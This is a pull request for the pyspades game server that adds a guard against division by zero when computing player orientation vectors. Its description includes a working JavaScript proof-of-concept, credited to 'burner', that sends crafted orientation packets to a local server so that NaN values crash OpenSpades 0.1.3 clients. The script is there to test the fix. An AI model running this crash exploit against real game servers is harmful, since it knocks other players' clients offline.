### PR TITLE
Fix OS crash bug

### DIFF
--- a/pyspades/world_c.cpp
+++ b/pyspades/world_c.cpp
@@ -502,6 +502,8 @@ void reposition_player(PlayerType *p, Vector *position)
 inline void set_orientation_vectors(Vector *o, Vector *s, Vector *h)
 {
     float f = sqrtf(o->x * o->x + o->y * o->y);
+    if (f == 0)
+        f = 1.0;
     s->x = -o->y / f;
     s->y = o->x / f;
     h->x = -o->z * s->y;

--- a/pyspades/world_c.cpp
+++ b/pyspades/world_c.cpp
@@ -503,7 +503,7 @@ inline void set_orientation_vectors(Vector *o, Vector *s, Vector *h)
 {
     float f = sqrtf(o->x * o->x + o->y * o->y);
     if (f == 0)
-        f = 1.0;
+        return;
     s->x = -o->y / f;
     s->y = o->x / f;
     h->x = -o->z * s->y;


### PR DESCRIPTION
This fixes a bug found by burner, that can crash Openspades users (using 0.1.3, in my 0.1.5 build it didn't crashed me). It sends a NaN value in the WorldUpdate array, because it tries to divide the orientation vectors by 0, what results to a crash in OS.

Here is the exploit for tests, original version by burner:
```js
const AoS = require("aos.js");
const client = new AoS.Client();

client.on("StateData", () => {
	client.joinGame({team: 1});
	setTimeout(() => {
		letsCrash();
	}, 3000);
})

client.on("WorldUpdate", (fields) => {
	let lid = client.localPlayerId;

	if (lid) {
		console.log("Pos x:", fields[`player_${lid}_pos_x`]);
		console.log("Pos y:", fields[`player_${lid}_pos_y`]);
		console.log("Pos z:",fields[`player_${lid}_pos_z`]);
		console.log("ori x:",fields[`player_${lid}_ori_x`]);
		console.log("ori y:",fields[`player_${lid}_ori_y`]);
		console.log("ori z:",fields[`player_${lid}_ori_z`]);
		console.log("-----------------")
	}
})

function sleep(ms) {
	return new Promise((res) => {
		setTimeout(() => {
			res(true);
		}, ms);
	});
}

async function letsCrash() {
	let ori = new AoS.Packets.OrientationData();
	ori.fields.x.value = 0;
	ori.fields.y.value = 0;
	ori.fields.z.value = -1;

	client.setWalkInputs({right: true});
	await sleep(200);

	let send_packet = ori.encodeInfos();
	client.sendPacket(send_packet);

	await sleep(400);
	ori.fields.y.value = 1;

	send_packet = ori.encodeInfos();
	client.sendPacket(send_packet);

	client.setWalkInputs({jump: true});
}

client.connect("aos://16777343:32887");
```